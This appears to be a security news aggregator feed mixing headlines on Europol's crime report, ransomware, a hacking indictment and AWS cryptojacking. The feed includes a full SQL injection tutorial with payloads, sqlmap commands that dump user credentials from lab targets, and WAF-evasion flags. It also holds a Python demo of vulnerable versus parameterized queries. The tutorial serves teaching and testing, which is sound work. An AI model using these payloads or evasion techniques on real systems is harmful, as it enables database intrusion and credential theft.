Optimize workflows for scale: Exposure management introduces a higher volume of security issues. Automation and orchestration are essential.
Expect a continuous evolution: Exposure management is not a one-time project but an ongoing program that adapts to new threat detection and business changes.

Takeaways

The transition from vulnerability management to exposure management is a necessary evolution in cybersecurity strategy. As attack surfaces expand and threats become more sophisticated, your organization needs to adopt a more holistic approach to cyber risk reduction. Although the journey can be complex and resource-intensive, the benefits — increased visibility, better risk prioritization and improved security outcomes — make it a worthwhile investment. I’m excited about what lies ahead and look forward to sharing more about our journey.
by Tenable
2025-03-24 08:22:23
A week in security (March 17 – March 23)
A list of topics we covered in the week of March 17 to March 23 of 2025
by Malwarebytes Labs
2025-03-24 08:14:48
FBI warns of malicious free online document converters spreading malware
The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware. “The FBI Denver Field Office is warning that agents are increasingly seeing a scam […]
by Security Affairs
2025-03-24 07:25:07
How AI, corruption and digital tools fuel Europe’s criminal underworld
Europol has released its 2025 report on serious and organized crime in the EU. The EU Serious and Organised Crime Threat Assessment (EU-SOCTA) is based on intelligence from EU countries and global law enforcement. The findings are stark. Organized crime is becoming more complex and harmful, with deeper roots across Europe. Organized crime is changing fast: the structure of organized crime is shifting. Groups are no longer tied to old ways of working. They’ve adapted …
by Help Net Security
2025-03-24 07:22:44
Cloak ransomware group hacked the Virginia Attorney General’s Office
The Cloak ransomware group claims responsibility for a cyberattack on the Virginia Attorney General’s Office that occurred in February. The ransomware group Cloak has claimed responsibility for a February cyberattack on the Virginia Attorney General Office. A cyberattack on the Virginia Attorney General’s Office forced officials to shut down IT systems, including email and VPN, […]
by Security Affairs
2025-03-24 07:07:36
Hybrid Threats and AI: Shaping the Future of EU’s Organized Threat Landscape in 2025
The European Union’s landscape of serious and organized crime is undergoing a significant transformation, according to the latest EU-SOCTA 2025 report released by Europol. This comprehensive assessment highlights how hybrid threats and artificial intelligence (AI) have become the core elements of the organized threat landscape in Europe, reshaping the tactics, tools, and strategies employed by criminal organizations.

EU-SOCTA 2025: The Growing Complexity of Organized Crime

Europol’s EU-SOCTA 2025 report presents a deep dive into the emerging and intensifying threat of organized crime within the EU. The document highlights the rapidly increasing convergence of cybercriminal activities, hybrid threats, and the exploitation of new technologies, making traditional crime-fighting approaches more obsolete than ever. “Criminals are leveraging cutting-edge technology to expand their reach and evade detection,” states Europol’s Director, Catherine De Bolle. “This trend is pushing us to rethink how we approach both traditional and cybercrime.”

As organized crime becomes increasingly embedded in the digital realm, its scope and impact reach beyond the traditional boundaries of criminal law enforcement. The EU-SOCTA 2025 highlights the urgency for proactive measures to counter these expanding threats, which include cyberattacks, AI-driven fraud, and the weaponization of digital technologies by criminal groups.

Hybrid Threats: The New Face of Crime

One of the most alarming aspects highlighted in the EU-SOCTA 2025 is the rise of hybrid threats, where criminal tactics merge with elements of state-sponsored activities, creating a volatile environment. These hybrid threats destabilize societies, exploit critical infrastructures, and often blur the lines between conventional crime and geopolitical conflict. “The DNA of organized crime is mutating,” says Cheyvoryea Gibson, Special Agent in Charge of the FBI’s Detroit Field Office. “Criminal networks are increasingly acting as proxies for hybrid threat actors, using digital tools to advance their agendas with little regard for national borders.”

Europol’s assessment stresses that hybrid threats represent a critical vulnerability for EU Member States, as criminal groups partner with hostile actors to advance their own agendas. This synergy between criminal organizations and geopolitical conflicts has created an unpredictable and dangerous security environment.

AI and New Technologies: Accelerating the Threats

Artificial intelligence and emerging technologies are not only reshaping the operational capabilities of organized crime but are also enabling criminals to streamline and scale their activities. From ransomware attacks to the exploitation of AI for social engineering, these technologies allow criminal networks to automate operations, making them more efficient and harder to trace. “AI is revolutionizing the organized crime landscape,” the EU-SOCTA 2025 report notes. “Criminal groups are using these tools to create sophisticated fraud schemes, bypass traditional detection methods, and even generate malicious content, such as deepfakes or child sexual abuse material.”

The EU-SOCTA 2025 identifies several key areas where AI is driving criminal innovation. This includes the use of AI for large-scale online fraud, cyberattacks, and even in the smuggling of migrants, where criminals exploit AI to create fake identities and cover their tracks in digital spaces.

The Fast-Growing Threats in the Organized Crime Landscape

According to the EU-SOCTA 2025, criminal activities in Europe are diversifying, becoming more complex and harder to manage. The report identifies several growing threats that are accelerated by the intersection of digital platforms and AI, including:

Cyberattacks: Ransomware attacks are evolving, now increasingly targeting critical infrastructures, governments, businesses, and individuals with potentially state-aligned objectives.
Online fraud schemes: AI-powered social engineering is now driving large-scale fraud, exploiting stolen data and personal information to deceive victims.
Migrant smuggling: Criminal networks are leveraging hybrid threat tactics, showing disregard for human dignity while capitalizing on geopolitical crises.
Drug trafficking: New routes and methods are emerging, often facilitated by AI and digital platforms that enable criminal groups to evade law enforcement.
Firearms trafficking: The online marketplace for weapons is growing, with technological advancements allowing easier access and trade of illegal firearms.
Waste crime: A less discussed but highly profitable sector, where criminal networks exploit businesses for illicit environmental damage.

Each of these threats is enhanced by the hybrid threat environment, where organized crime increasingly collaborates with actors seeking to destabilize Europe.

Conclusion

The EU-SOCTA 2025 report highlights the urgent need for a unified response to organized crime, emphasizing the interconnected nature of digital fraud, hybrid threats, and new technologies. Criminal organizations are adapting rapidly, utilizing technologies like blockchain and cryptocurrencies to launder money and infiltrate legitimate sectors. To effectively counter these cyber threats, law enforcement across Europe must adjust their strategies to target both the criminal markets and the technological tools that sustain them.
by The Cyber Express
2025-03-24 07:07:00
Former University of Michigan Football Coach Indicted on Charges of Unauthorized Access and Identity Theft
Matthew Weiss, the former Co-Offensive Coordinator and Quarterbacks Coach at the University of Michigan, has been indicted on serious charges related to unauthorized access to computers and aggravated identity theft. Weiss, aged 42 and a resident of Ann Arbor, Michigan, faces a 24-count indictment that includes 14 counts of unauthorized access to computers and 10 counts of aggravated identity theft. The indictment was announced by Acting U.S. Attorney Julie A. Beck, with support from Cheyvoryea Gibson, Special Agent in Charge of the FBI Detroit Field Office.

Unauthorized Access to Student-athlete Databases

The charges stem from Weiss’s alleged activities between 2015 and January 2023, during which time he is accused of illegally accessing confidential data stored by a third-party vendor managing student-athlete databases for over 100 colleges and universities. Through these unauthorized means, Weiss is believed to have accessed and downloaded sensitive personal information and medical records of over 150,000 athletes.

In addition to the unauthorized access of student data, the indictment reveals that Weiss used the obtained information, combined with his own internet research, to infiltrate the online accounts of more than 2,000 student-athletes. His activities also extended to an additional 1,300 students and alumni from various universities across the United States. These accounts included social media, email, and cloud storage platforms. Weiss is accused of downloading private and intimate photos and videos from these accounts—content that was never meant to be publicly shared.

Acting U.S. Attorney Julie A. Beck emphasized the seriousness of the charges, stating, “Our office will move aggressively to prosecute computer hacking to protect the private accounts of our citizens. We stand ready with our law enforcement partners to bring those who illegally invade the privacy of others to justice.”

Details into the Investigations

FBI Special Agent Cheyvoryea Gibson echoed these sentiments, highlighting the extensive investigative efforts involved in the case. “Today’s indictment of Matthew Weiss underscores the commitment and meticulous investigative efforts of our law enforcement professionals,” said Gibson. “The FBI Detroit Cyber Task Force, in close collaboration with the University of Michigan Police Department, worked relentlessly on this case to safeguard and protect our community.”

If convicted on all counts, Weiss faces a maximum penalty of five years in prison for each count of unauthorized access to computers. Additionally, each count of aggravated identity theft carries a potential penalty of two years in prison. Notably, a conviction for aggravated identity theft mandates a two-year mandatory minimum sentence, which must be served consecutively to any other sentence imposed for the underlying charges.

Conclusion

The case is still in its early stages, and Weiss, like any defendant, is entitled to the presumption of innocence unless proven guilty beyond a reasonable doubt. However, the indictment presents a disturbing picture of the misuse of technology and the violation of individuals’ privacy. This case serves as a reminder of the risks associated with unauthorized access to personal data and the potential for identity theft, which can have long-lasting consequences for victims. The prosecution of Weiss is being led by Assistant U.S. Attorneys Timothy Wyse and Patrick Corbett, with the investigation being conducted by the Federal Bureau of Investigation. The case will continue to unfold, and authorities are likely to pursue further action to ensure that those responsible for identity theft and unauthorized access to personal data are held accountable.
by The Cyber Express
2025-03-24 06:42:06
The best private browser in 2025: where to flee from Chrome, Edge, and Firefox | Kaspersky official blog
New browser tracking threats and how to counter them.
by Kaspersky
2025-03-24 06:15:26
How to Find SQL Injection and Get Bounty of $100, $200, $500
Free article link. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-24 06:15:06
SQL Injection Exploitation Made Easy: A Practical Guide to SQLMAP
Learn how to exploit SQL injection vulnerabilities using SQLMAP, an automated penetration testing tool for database security assessment.

Introduction

SQL Injection remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate backend databases. SQLMAP, an advanced penetration testing tool, automates the exploitation process, making database enumeration and extraction effortless. This guide will walk you through SQL Injection, its types, and SQLMAP’s powerful capabilities with real-world examples on test environments like TestVulnHub and DVWA.

[Image: SQL Injection, generated by the author]

Index

What is SQL Injection?
SQL Injection Basics (with practical commands)
SQL Injection Types
SQLMAP Guide
Basics about SQLMAP
SQLMAP Command Reference Table
Practical SQLMAP Commands (TestVulnHub)
Practical SQLMAP Commands with Cookies (DVWA)

What is SQL Injection?

SQL Injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries a web application makes to its database. By injecting malicious SQL statements, an attacker can view, modify, or delete data and even gain administrative access.

SQL Injection Basics (with Practical Commands)

A basic SQL Injection attack involves injecting SQL queries via an application’s input fields. Below are common payloads used to test for SQL Injection:

1. Authentication Bypass: This payload bypasses authentication mechanisms by always returning a true condition.
' OR 1=1 --

2. Identifying Number of Columns: This helps identify how many columns exist in a database.
' ORDER BY 3 --

3. Extracting Database Version: This retrieves the database version information.
' UNION SELECT NULL, @@version, NULL --

4. Retrieving Current Database: This extracts the name of the current database in use.
' UNION SELECT NULL, database(), NULL --

5. Listing Usernames from a Table: This retrieves stored usernames and passwords (if available in plaintext).
' UNION SELECT NULL, username, password FROM users --

6. Checking Database Users: This retrieves the database users.
' UNION SELECT NULL, user FROM mysql.user --

7. Extracting Table Names: This helps in enumerating available tables in the database.
' UNION SELECT NULL, table_name FROM information_schema.tables --

8. Extracting Column Names: This reveals column names of a specific table.
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --

9. Extracting Data from a Specific Column: This extracts usernames from the ‘users’ table.
' UNION SELECT username FROM users --

SQL Injection Types

In-band SQLi (Classic) — Uses the same communication channel to perform the attack and retrieve results. This includes Error-Based and Union-Based SQLi.
Inferential SQLi (Blind) — No direct database response; the attacker infers information based on application behavior. This includes Boolean-Based and Time-Based SQLi.
Out-of-band SQLi — Uses different channels (like DNS or HTTP requests) to exfiltrate data when in-band methods are unavailable.
Error-Based SQLi — Extracts information through error messages.
Union-Based SQLi — Uses the UNION SQL operator to combine results.
Boolean-Based SQLi — Determines responses based on true/false conditions.
Time-Based SQLi — Uses time delays to infer database responses.

SQLMAP Guide

SQLMAP Basics: SQLMAP is an open-source penetration testing tool that automates SQL Injection detection and exploitation. It supports multiple injection techniques and database management systems (DBMS), including MySQL, PostgreSQL, and MSSQL.

SQLMAP Command Reference Table: [Image: table of SQLMAP commands, not reproduced]

SQLMAP Test Case 1 {Basic} (TestVulnHub)

Below are practical SQLMAP commands executed on testphp.vulnweb.com:

1. Enumerate databases: This command retrieves the names of all databases available on the target system.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 --dbs
From the screenshot, we can see the database names as acuart and information_schema.

2. Enumerate tables from a specific database: This command lists all tables within the database acuart.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables
From the screenshot, we can see the various table names.

3. Enumerate columns from a specific table: This command retrieves the column names from the users table in the acuart database.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users --columns
From the screenshot, we can see the various column names.

4. Dump specific user data (username & password) from a table: This command extracts and displays usernames and passwords from the users table.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname,pass --dump
From the screenshot, we can see the desired information.

SQLMAP Test Case 2 {Intermediate — Cookies} (DVWA)

Below are SQLMAP commands executed on DVWA using session cookies. Cookies can be easily accessed via Right Click > Inspect > Storage > Cookies as shown in the screenshot. [Screenshot: DVWA cookies]

1. Enumerate databases: This command retrieves all available databases while using an authenticated session.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" --dbs

2. Enumerate tables from a specific database: This command lists all tables in the dvwa database.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa --tables

3. Enumerate columns from a specific table: This command displays column names in the users table of the dvwa database.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users --columns

4. Dump specific user data (user ID & password) from a table: This command retrieves and displays user IDs and password hashes from the users table.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users -C user_id,password --dump

(Note: the --cookie value uses name=value pairs separated by semicolons; the session id itself is a placeholder.)

SQLMAP Test Case 3 {Advanced} (Bypassing WAFs with SQLMAP)

Web Application Firewalls (WAFs) are designed to block SQL Injection attempts. However, SQLMAP offers various evasion techniques to bypass WAF protections.

1. Tamper Scripts: SQLMAP includes multiple tamper scripts to obfuscate SQL payloads. Some useful ones include:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment,randomcase
Common tamper scripts:
space2comment: Converts spaces to inline comments (/**/)
randomcase: Randomizes uppercase/lowercase letters
between: Replaces equal (=) signs with BETWEEN

2. Using Hex Encoding: This encodes payloads in hexadecimal to evade signature-based detection.
sqlmap -u "http://target.com/vuln.php?id=1" --hex

3. Changing User-Agent and Referer Headers: This helps avoid WAFs that block automated scanners.
sqlmap -u "http://target.com/vuln.php?id=1" --user-agent="Mozilla/5.0" --referer="http://google.com"

4. Custom Injection Points: Using * as a wildcard helps SQLMAP inject payloads at different points.
sqlmap -u "http://target.com/vuln.php?id=1*" --dbs

Conclusion

SQLMAP is an essential tool for security professionals and penetration testers, enabling efficient exploitation of SQL Injection vulnerabilities. Understanding its commands and capabilities ensures thorough database security assessments. Always test in legal environments and use SQLMAP responsibly to strengthen cybersecurity defenses. Happy Hacking! 🔥
by InfoSec Write-ups
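The guide above lists the payloads and the sqlmap invocations but never shows the code defect that makes them work, which is what an application developer needs in order to fix it. The following is an added example (not from the InfoSec Write-ups article) that reproduces two of the guide's basics, the `' OR 1=1 --` authentication bypass and a UNION-based table listing, against an in-memory SQLite database, and places each vulnerable query beside its parameterized form. The artists and users tables and their rows are constructed; SQLite's sqlite_master plays the role of MySQL's information_schema.tables from the article's payloads.

```python
"""SQL Injection basics from the guide, reproduced in SQLite beside the fix.

Added example. Tables and rows are constructed; function names are this example's own.
"""
import hashlib
import sqlite3


def _pw_hash(password):
    # Demo only: a real application stores a salted, slow hash (bcrypt/argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Build the constructed schema: an artists lookup table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE artists (id INTEGER PRIMARY KEY, name TEXT, bio TEXT);
        CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO artists VALUES (1, 'Artist One', 'first act'), (2, 'Artist Two', 'second act');
    """)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", _pw_hash("correct horse")), (2, "bob", _pw_hash("hunter2"))])
    return conn


# --- vulnerable: user input is pasted into the SQL text and becomes part of its grammar ---

def login_vulnerable(conn, username, password):
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{_pw_hash(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def get_artist_vulnerable(conn, artist_id):
    # Mirrors a numeric parameter such as artists.php?artist=2: no quotes around the value,
    # so the payload needs no quote character at all.
    sql = f"SELECT name, bio FROM artists WHERE id = {artist_id}"
    return [name for name, _bio in conn.execute(sql).fetchall()]


# --- hardened: the SQL text is a constant; input only ever travels as a bound value ---

def login_safe(conn, username, password):
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password_hash = ?",
                       (username, _pw_hash(password))).fetchone()
    return row[0] if row else None


def get_artist_safe(conn, artist_id):
    try:
        aid = int(artist_id)          # reject anything that is not an integer id
    except (TypeError, ValueError):
        return []
    rows = conn.execute("SELECT name, bio FROM artists WHERE id = ?", (aid,)).fetchall()
    return [name for name, _bio in rows]


# Payloads from the guide; information_schema.tables becomes sqlite_master here.
BYPASS = "' OR 1=1 --"
LIST_TABLES = "2 UNION SELECT name, sql FROM sqlite_master WHERE type = 'table' --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login: ", login_vulnerable(conn, BYPASS, "anything"))   # alice
    print("safe login:       ", login_safe(conn, BYPASS, "anything"))         # None
    print("vulnerable lookup:", get_artist_vulnerable(conn, LIST_TABLES))    # artist + table names
    print("safe lookup:      ", get_artist_safe(conn, LIST_TABLES))          # []
```

Two points the guide's command list does not make explicit: hashing the password does nothing against injection through the username field, because the username is still spliced into the query text; and the numeric case needs no quote at all, so filtering quote characters is not a fix. Binding parameters (and, for numeric ids, type-checking the input first) is what closes the hole, and it is the same fix regardless of which payload family from the guide is used.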
2025-03-24 06:14:25
Symbolic Links in Linux
Learn about symbolic links, their uses, soft links, hard links, and dead links, among other topics… Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-24 06:00:16
Enterprises walk a tightrope between AI innovation and securityAI/ML tool usage surged globally in 2024, with enterprises integrating AI into operations and employees embedding it in daily workflows, according to Zscaler. The report reveals a 3,000+% year-over-year growth in enterprise use of AI/ML tools, highlighting the rapid adoption of AI technologies across industries to unlock new levels of productivity, efficiency, and innovation. Findings are based on analysis of 536.5 billion total AI and ML transactions in the Zscaler cloud from February 2024 to … More → The post Enterprises walk a tightrope between AI innovation and security appeared first on Help Net Security.
by Help Net Security
2025-03-24 06:00:00
Is the Middle East's Race to Digitize a Threat to Infrastructure?As the region continues with its ambitious road map, cybersecurity must be woven into every step of the process.
by Dark Reading
2025-03-24 06:00:00
Trump’s Aggression Sours Europe on US Cloud GiantsCompanies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.
by WIRED Security News
2025-03-24 05:30:16
Finders Keypers: Open-source AWS KMS key usage finderFinders Keypers is an open-source tool for analyzing the current usage of AWS KMS keys. It supports both AWS customer managed KMS keys and AWS Managed KMS keys. Use cases include: Identifying the blast radius of specific KMS keys and the resources they may impact, such as S3 data, databases like RDS and DynamoDB, and more. Assessing encryption access control to determine which principals may have access to data and resources. Evaluating the impact of … More → The post Finders Keypers: Open-source AWS KMS key usage finder appeared first on Help Net Security.
by Help Net Security
2025-03-24 05:00:18
Cloud providers aren’t delivering on security promisesSecurity concerns around cloud environments has prompted 44% of CISOs to change cloud service provider, according to Arctic Wolf. This is being driven by the fact that 24% don’t believe their cloud environment is secure, and 43% think cloud service providers overpromised the security protection they would receive. CISOs rely on multiple cloud providers Cloud providers have become increasingly critical to firms, with the technology enabling workers to access files and services from any location. … More → The post Cloud providers aren’t delivering on security promises appeared first on Help Net Security.
by Help Net Security
2025-03-24 05:00:00
How ASPM gives you control over complex architecturesASPM gives organizations control by unifying risk data, automating threat analysis, and prioritizing vulnerabilities based on their business impact.
by Cybersecurity Dive
2025-03-24 00:08:37
Google Gemini's Astra (screen sharing) rolls out on Android for some usersAt MWC 2025, Google confirmed it was working on screen and video share capabilities for Gemini Live, codenamed "Project Astra". At that time, Google promised that the feature would begin rolling out soon, and now some users have spotted it in the wild. [...]
by BleepingComputer
2025-03-23 22:07:52
How to Delete Duplicate Photos on iPhone to Save StorageLearn the easiest way to delete duplicate photos on your iPhone device with our simple, step-by-step guide.
by Hackread
2025-03-23 18:58:38
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 38Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Decrypting Encrypted files from Akira Ransomware (Linux/ESXI variant 2024) using a bunch of GPUs Jaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook—Then a Second Hacker Strikes ClearFake’s New Widespread Variant: Increased Web3 […]
by Security Affairs
2025-03-23 18:44:14
Ansible vs Terraform: Which is More Secure for Infrastructure Automation?Gartner describes infrastructure as code (IaC) as a key way to unlock the potential of the cloud. However,…
by Hackread
2025-03-23 18:41:50
Security Affairs newsletter Round 516 by Pierluigi Paganini – INTERNATIONAL EDITIONA new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. Treasury removed sanctions against the crypto mixer service Tornado Cash Zero-day broker Operation Zero offers up to […]
by Security Affairs
2025-03-23 17:31:56
What Google Chrome knows about you, with Carey Parker (Lock and Code S06E06)This week on the Lock and Code podcast, we speak with Carey Parker about what Google Chrome knows about you.
by Malwarebytes Labs
2025-03-23 14:27:06
UAT-5918 APT group targets critical TaiwanCisco Talos found UAT-5918, active since 2023, using web shells and open-source tools for persistence, info theft, and credential harvesting. Cisco Talos uncovered UAT-5918, an info-stealing threat actor active since 2023, using web shells and open-source tools for persistence and credential theft. The APT UAT-5918 targets Taiwan, exploiting N-day vulnerabilities in unpatched servers for long-term […]
by Security Affairs
2025-03-23 13:00:48
VanHelsing, new RaaS in TownKey Points VanHelsing RaaS In recent weeks, a new and rapidly expanding ransomware-as-a-service (RaaS) program called VanHelsingRaaS has been making waves in the cybercrime world. Launched on March 7, 2025, this service has already demonstrated its rapid growth and deadly potential, having infected three victims within just two weeks of its introduction. Reputable affiliates can […] The post VanHelsing, new RaaS in Town appeared first on Check Point Research.
by Check Point Research
2025-03-23 10:56:00
Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories' CI/CD Secrets ExposedThe supply chain attack involving the GitHub Action "tj-actions/changed-files" started as a highly-targeted attack against one of Coinbase's open-source projects, before evolving into something more widespread in scope. "The payload was focused on exploiting the public CI/CD flow of one of their open source projects – agentkit, probably with the purpose of leveraging it for further compromises,"
by The Hacker News
2025-03-23 10:09:19
FBI warnings are true—fake file converters do push malwareThe FBI is warning that fake online document converters are being used to steal people's information and, in worst-case scenarios, lead to ransomware attacks. [...]
by BleepingComputer
2025-03-23 09:00:28
Week in review: Veeam Backup & Replication RCE fixed, free file converter sites deliver malwareHere’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. FBI: Free file converter sites and tools deliver malware Malware peddlers are increasingly targeting users who are searching … More → The post Week in review: Veeam Backup & Replication RCE fixed, free file converter sites deliver malware appeared first on Help Net Security.
by Help Net Security
2025-03-23 04:00:00
CVE-2025-29927 Authorization Bypass in Next.js MiddlewareOn Friday morning, March 21, 2025, at 9:00 a.m. UTC, a security advisory identified as CVE-2025-29927 was published. It cited a critical 9.1 severity vulnerability for mainstream Next.js applications.
by Snyk
2025-03-23 02:56:57
Working with Linux Open FilesUnderstand Open Files in Linux, including the lsof command, file descriptors (FD), and the Type field.🐧Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-03-23 02:56:32
Cryptojacking: When Hackers Hijack Your Cloud to Mine Money☠️💰
Imagine this: 7AM, still tired, you open your AWS dashboard, coffee in hand, and then… BOOOOM!!! 💥 A $15,000 bill instead of the usual $300. You check your account, refresh the page (just in case hehe)… but no, it’s real, you’re well awake!! 😱
No, it’s not a billing mistake. Congratulations! You’ve just become the unwilling bankroller of a cybercriminal gang that hijacked your infrastructure to mine crypto — on YOUR dime, yay! 🎉
> No worries.. you’re not alone in this nightmare. Cryptojacking attacks surged by 75% in 2023, according to Sysdig. Campaigns like AmberSquid 🦑 even exploit lesser-known AWS services to stay under the radar.
☞ But as always, no worries! I got you! Let’s see how we can prevent this from happening & what to do if it’s the case.
💡 TL;DR — Go to the bottom of the page, a cool recap awaits you! 😜
📖 Kenza.. sorry but what Exactly is Cryptojacking?
Good question! Cryptojacking is all about mining crypto at someone else’s expense. Instead of investing in hardware and paying for electricity, attackers squat on your cloud infrastructure. That’s the laziest attack lol.
Back in the day, they simply launched EC2 instances loaded with mining software. But that became too easy to detect.
➞ Now, they’re targeting less-monitored AWS services, such as:
🚀 AWS Amplify
🛳 AWS Fargate
🤖 SageMaker
More subtle, more profitable, and much harder to catch. 🕵️
💡 Think of it like this: Someone is siphoning gas from your car without you noticing. The only difference? The thief doesn’t leave you a thank-you note.
As technology evolves, attackers up their game too. Let’s dive into their arsenal…
🏴☠️ The 3 Types of Cryptojacking: How Attackers Drain Your Resources
Behind these attacks are highly organized groups with tactics straight out of a spy movie…
💡 Now that you know how threat actors exploit different methods to hijack your resources, let’s look at a real-world example of how they target AWS services that often fly under the radar.
🏴☠️ The Key Players in Cryptojacking: TeamTNT, Silent Bob & AmberSquid
Everyone’s heard of TeamTNT and the Silent Bob campaign, but today, I want to focus on AmberSquid, which made waves in 2023.
Silent Bob primarily attacks misconfigured Docker APIs and exposed JupyterLab instances. Check out AquaSec’s full analysis here: Silent Bob Cloud Attack.
➡️ But AmberSquid? That’s a whole different story.
(Image credit: hackmetrix)
🦑 AmberSquid: When Cryptojacking Targets AWS Services in the Shadows
Discovered by Sysdig, AmberSquid struck where it hurts: AWS services that aren’t closely monitored — allowing attackers to mine crypto undetected.
➞ While most cryptojacking campaigns focus on EC2, AmberSquid shifts its attention to:
AWS Amplify
AWS Fargate
Amazon SageMaker
Amazon Elastic Container Service (ECS)
AWS CloudFormation
These services often lack strong security oversight, but for victims, the costs can skyrocket to over $10,000 per day (Sysdig Threat Research Team).
💭 Imagine…
Picture this: Peter, the CTO of a small innovative startup. One morning, as he checks his AWS bill, he notices an unexpected charge of $20,000. At first, he thinks it’s a mistake, but as he digs deeper, he realizes that resource usage exploded overnight… even though no new applications were deployed.
> His heart skips a beat.. A mistake? He keeps digging… and discovers that a cryptocurrency miner has quietly set up shop on AWS Fargate and SageMaker. What seemed like a regular day quickly turns into a full-blown financial nightmare… And it can escalate really fast!
Now that you’ve got the big picture of the AmberSquid campaign through Peter’s eyes, let’s take a closer look at how attackers successfully deployed malicious scripts to mine cryptocurrencies on seemingly harmless AWS services.
🎯 Targets: Less Common, Yet Strategic Services
By choosing lesser-known services like Amplify, Fargate, and SageMaker, the attackers flew under the radar of traditional security mechanisms.
➞ This made detection and intervention much more complex, highlighting the importance of monitoring the entire infrastructure, even the services that seem harmless.
🔍 AmberSquid Attack Methodology:
⓵ Attackers used AWS CodeCommit to create a private repository containing the code for an AWS Amplify app.
⓶ From this repo, shell scripts were executed to deploy a web app on AWS Amplify, which secretly launched a crypto miner.
⓷ Similar techniques were used to exploit Fargate and SageMaker, spinning up cloud resources for mining.
➡ Here’s a breakdown of the AWS services used in this attack:
💡 Key Lessons from the AmberSquid Attack
The AmberSquid attack highlights several critical takeaways:
🔹 Exploitation of less-monitored services → Services like Fargate and SageMaker, not typically associated with cryptojacking, were used to mine crypto. This proves the importance of monitoring all cloud services, not just EC2.
🔹 Code pipeline security → Attackers used CodeCommit to store malicious scripts. This underscores the need to secure your entire CI/CD pipeline, including AWS Amplify.
🔹 Visibility gaps → Services like Fargate offer limited real-time visibility, making it harder to detect cryptojacking activities.
🔹 Risk of shell scripts → Attackers deployed crypto miners via scripts on services like Lambda and SageMaker, emphasizing the need for strict execution permissions.
🔹 Unexpected costs → AWS’s pay-as-you-go pricing makes cryptojacking profitable for attackers while remaining unnoticed until you get a massive bill.
These insights show that attackers are getting stealthier, favoring low-profile techniques that evade detection. This makes proactive cloud security a must.
💸 The Real Cost of that Incident:
➞ Once attackers infiltrate your AWS account and launch crypto miners, your costs skyrocket within hours.
💰 Here’s a daily cost estimate based on real-world attacks:
Threat actors now target overlooked cloud services, exploiting automation and high-performance resources to launch cryptojacking campaigns. The result? Sky-high bills and hard-to-detect damages.
➡️ For more details, check out 🔗 Sysdig Blog: AmberSquid Analysis.
Cryptojacking isn’t just stealing your compute power — it’s draining your budget, resources, and security posture. Time to fight back. 🛡️🚀
💰 How Does an AWS Account Fall Victim to Cryptojacking?
Attackers don’t mine just any cryptocurrency. They focus on:
Monero (XMR) → Anonymous, easy to mine on CPU. The #1 choice for cryptojacking.
Ethereum (ETH) → Used to be profitable before Proof-of-Stake, but was a major target.
Zcash (ZEC) → Highly valued for its private transactions.
Bitcoin (BTC) → Rare in cryptojacking (too resource-intensive).
🚨 How do they Infiltrate Your AWS Account?
Cybercriminals gain access to AWS accounts in multiple ways:
1️⃣ Leaked credentials → If your AWS keys leak on GitHub, you’re an easy target. 80% of cloud compromises start with exposed credentials. (Unit 42, Oct 2023)
2️⃣ No MFA → No Multi-Factor Authentication? They can easily use stolen credentials.
3️⃣ Privilege escalation → Once inside, attackers escalate privileges, targeting admin accounts or overly permissive IAM roles.
4️⃣ Subscription hijacking → They move your resources to another tenant, making detection even harder.
⚡ Rapid Setup: From AWS Account to Crypto Mining Farm:
Once inside, attackers waste no time. Their goal? Turn your cloud into a mining farm within minutes.
If GPUs are available, they deploy NVIDIA GPU drivers to maximize computing power.
🔍 Signs of Cryptojacking Activity:
➞ Sudden, massive deployment of GPU drivers.
➞ Unknown accounts installing GPU extensions for no reason.
➞ Connections to known mining pools.
➥️ More details in this research: “Behavior-Based Detection of GPU Cryptojacking” (Ural Federal Univ, Aug 2024)
🧐 Why Is Cryptojacking So Popular Among Attackers?
